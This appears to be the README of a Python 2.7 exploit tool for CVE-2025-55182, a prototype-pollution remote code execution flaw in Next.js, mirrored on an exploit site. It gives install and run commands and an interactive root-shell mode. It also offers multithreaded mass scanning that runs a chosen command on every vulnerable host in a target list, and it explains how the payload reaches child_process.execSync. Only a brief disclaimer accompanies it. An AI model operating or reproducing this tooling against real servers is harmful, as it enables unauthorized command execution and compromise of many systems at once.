Share
## https://sploitus.com/exploit?id=3E3C8061-171A-5938-8471-03B786DB14FB
# CVE-2025-55182 - React2shell

A Python 2.7 exploit for **CVE-2025-55182** – a critical prototype pollution / RCE vulnerability in Next.js applications.  
This tool allows both **single‑target interactive shell** and **mass scanning** of multiple hosts with multithreading, colorful output, and automatic HTTPS fallback.

---

## 🚀 Features

- ✅ **Interactive Shell** for single targets – execute arbitrary system commands
- ✅ **Mass Scan** from a file list – multithreaded, fast, results saved automatically
- ✅ **Auto‑detection** – single URL → shell mode, existing file → mass scan mode
- ✅ **Automatic HTTPS** – adds `https://` if no protocol is given
- ✅ **Thread‑safe file writing** – saves vulnerable results in real‑time
- ✅ **Custom commands** – change default `id` to any command (`whoami`, `ls`, etc.)
- ✅ **No external dependencies** – only `requests` (easily installable)

---

## 📋 Requirements

- **Python 2.7** (the tool is specifically written for Python 2.7)
- `requests` library – install with:
  ```bash
  pip install requests
  ```

---

· A terminal that supports ANSI colors (most Linux/macOS terminals, Windows Terminal, PowerShell)


📦 Installation

```bash
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
```

Make the script executable (optional):

```bash
chmod +x CVE-2025-55182.py
```

---

🎯 Usage

1. Interactive Shell (Single Target)

```bash
python2 CVE-2025-55182.py https://target.com
```

or without protocol (HTTPS is added automatically):

```bash
python2 CVE-2025-55182.py target.com
```

Once connected and verified vulnerable, you get a shell prompt:

```
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...
```

Built‑in commands:

· exit / quit – close shell
· clear – clear screen
· help – show help

2. Mass Scan (List of Targets)

Prepare a file with one target per line (with or without http/https):

targets.txt

```
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
```

Run mass scan (default: 10 threads, command id, output res.txt):

```bash
python2 CVE-2025-55182.py targets.txt
```

Customize threads, command, output file:

```bash
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
```

· 20 – number of threads
· whoami – command to execute on each vulnerable target
· results.txt – output file (only vulnerable entries are saved)

Mass scan output example:

```
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...
```

Saved results (res.txt):

```
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
```

---

🧪 How It Works

The exploit sends a crafted multipart/form-data request to a Next.js endpoint (/login is appended if the path is empty).
It abuses prototype pollution (__proto__:then and constructor:constructor) to inject a malicious prefix that executes a system command using child_process.execSync().

The server responds with a 303 redirect containing the command output in the x-action-redirect header (or Location). The tool extracts the result from /login?a=.

---

🛡️ Disclaimer

This tool is intended for educational purposes and authorized security testing only.
Unauthorized access to computer systems is illegal. The author assumes no liability for any misuse or damage caused by this software.
You must have explicit written permission from the owner of the target system before using this exploit.

More Disclaimer You Can see the disclaimer on the cover of Jenderal92. You can check it [HERE !!!](https://github.com/Jenderal92/)